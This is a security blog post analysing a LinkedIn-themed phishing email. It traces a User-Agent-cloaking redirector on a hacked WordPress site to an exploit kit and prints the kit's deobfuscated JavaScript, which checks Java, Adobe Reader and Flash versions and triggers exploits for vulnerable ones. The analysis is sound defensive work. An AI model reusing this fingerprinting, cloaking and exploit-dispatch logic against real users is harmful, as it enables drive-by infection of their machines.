Spam in combination with phishing and exploiting

Yesterday a reader of ours forwarded two phishing emails. The first email was a paypal phishing email, but the links in it were offline so we concentrated on the second one. This second email looked like it was from linked-in.

The LinkedIn spam mail

We decided to analyze the link in the spam mail.

Attention: Please only open this url if you know what you’re doing. Tipp: “REMOVE” ;)

1

http://bobdykstra.com/wp-content/_REMOVE_themes/toolbox/wp-secure.php?c002

It seems like someone hacked a wordpress installation and abused it to send out some phishing emails. The script “wp-secure.php” contained some logic which chose the redirection destination: Either microfsoft.com or the exploit kit.

The script checked the “UserAgent”-Header in the HTTP-Request. If you did not send the right or a wrong UserAgent you were redirected to microsoft.com:

1
2
3
4
5
6
7
8

% curl -D - http://bobdykstra.com/wp-content/themes/_REMOVE_toolbox/wp-secure.php
HTTP/1.1 302 Found
Date: Tue, 12 Mar 2013 19:02:27 GMT
Server: Apache
Location: http://microsoft.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html

If you used the Firefox-UserAgent with “windows” in it, you were redirected to the exploit kit.

1
2
3
4
5
6
7
8

% curl -D - -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" http://bobdykstra.com/wp-content/themes/_REMOVE_toolbox/wp-secure.php
HTTP/1.1 302 Found
Date: Tue, 12 Mar 2013 19:05:39 GMT
Server: Apache
Location: http://1oihfoishfos.qHigh.com/closest/_REMOVE_209tuj2dsljdglsgjwrigslgkjskga.php
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html

Ok, there’s another fancy-looking url. Let’s have a look at it (the UserAgent did not matter anymore):

1
2
3
4
5
6
7
8
9

-> % curl -D - -s http://1oihjsfoihoifh.ftpserver.biz/closest/_REMOVE_209tuj2dsljdglsgjwrigslgkjskga.php -o /dev/null
HTTP/1.1 200 OK
Server: nginx/1.2.7
Date: Tue, 12 Mar 2013 19:04:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Vary: Accept-Encoding

The response contained about 150 kb of page-content. It came out that it was some html code and a lot of javascript code.

You can find the full HTTP-Response here: http://uploads.internetwache.org/weiterleitung.txt

The sourcecode

Obfuscated code is quite hard to read, so the next step was to deobfuscate it. That was really easy: Just apply the following replacement:

1

z("zxczxc=1;"+s); => console.log(s);

You can find the result here: http://uploads.internetwache.org/weiterleitung.html

After using JSBeautifier.org the code was even more readable:

1

http://nopaste.me/paste/1716874074513f7fc517551

The code checks some version numbers of plugins like Adobe, Java, Flash ….

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

function svwrbew6436b($) {
    var ar = [];
    var javax = ($.getVersion("Ja" + "va") + ".").toString()["split"](".");
    if ($.isMinVersion("Ja" + "va") >= 0 && ((javax[0] == 1 && javax[1] == 7 && javax[3] < 9))) {
        ar["push"](j2);
    } else if ($.isMinVersion("Ja" + "va") >= 0 && ((javax[0] == 1 && javax[1] == 6 && javax[3] < 33) || (javax[0] == 1 &&javax[1] < 6))) {
        ar["push"](j1);
    }
    pdfver = pdpd.getVersion("AdobeReader");
    if (window.document) if (typeof pdfver == "string") {
        pdfver = pdfver["split"](".")
    } else {
        pdfver = [0, 0, 0, 0]
    }
    if (pdfver[0] > 0 && pdfver[0] < 8) {
        if (window.document) ar["push"](p1);
    }
    if (((pdfver[0] == 9) && (pdfver[1] >= 3)) || ((pdfver[0] == 10) && (pdfver[1] < 103))) {
        ar["push"](p3);
    } else {
        if (window.document && (pdfver[0] == 8 || (pdfver[0] == 9 && pdfver[1] < 4))) {
            ar["push"](p2);
        }
    }
    var ver = ($$.getVersion("Flash") + ".").toString()["split"](".");
    if (((ver[0] == 10 && ver[1] == 0 && ver[2] > 40) || (window.document && (ver[0] == 10 && ver[1] > 0) && (ver[0] == 10&& ver[1] < 2))) || window.document && ((ver[0] == 10 && ver[1] == 2 && ver[2] < 159) || (ver[0] == 10 && ver[1] < 2))) {
        ar["push"](ff2);
    }
    if ((ver[0] == 10 && ver[1] == 3 && ver[2] == 181 && ver[3] <= 23) || (ver[0] == 10 && ver[1] == 3 && ver[2] < 181)) {
        ar["push"](f1);
    }
    var arcalli = 0;
    var arcall = function () {
        if (ar.length <= arcalli) return 123;
        ss = setTimeout;
        var res = ar[arcalli]();
        arcalli++;
        if (res && window.document) {
            ss(function () {
                arcall()
            }, 5509);
        } else {
            arcall();
        }
    };
    arcall();
}

Feel free to further analyze this exploit-code. All that we know is that based on the different version numbers, some specific functions will be executed (exploits?). We sent an abuse email to the DynDNS provider “ftpserver.biz”. Maybe this will help somehow ;)

Conclusion

Like always: Never open strange links in emails from unstrusted senders!

Otherwise you’re likely to be owned by some bad guys :( Tip: Disable as much browser extensions as possible and/or keep them up2date. Additionally, there are some useful plugins (e.g. NoScript) available for the most common browsers.

The team of internetwache.org